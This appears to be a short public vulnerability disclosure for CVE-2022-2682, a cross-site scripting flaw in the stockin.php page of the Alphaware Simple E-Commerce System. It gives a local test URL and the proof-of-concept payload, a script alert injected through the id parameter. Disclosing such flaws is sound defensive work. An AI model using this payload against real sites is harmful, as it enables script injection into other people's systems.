Headline
CVE-2022-2682: Alphaware-E-Commerce-System/Alphaware_xss.md at main · 895515845/Alphaware-E-Commerce-System
A vulnerability, which was classified as problematic, has been found in SourceCodester Alphaware Simple E-Commerce System. Affected by this issue is some unknown functionality of the file stockin.php. The manipulation of the argument id with the input '"><script>alert(/xss/)</script> leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-205670 is the identifier assigned to this vulnerability.
Alphaware e-Commerce system has XSS vulnerability****XSS
Enter the administrator background page
http://127.0.0.1/cve/admin/stockin.php?id=3
There is an xss vulnerability in the stockin.php file
Enter XSS payload
'"><script>alert(/xss/)</script>
The page successfully pops up XSS, the vulnerability exists
Vulnerable code
link
https://www.sourcecodester.com/php/11676/alphaware-simple-e-commerce-system.html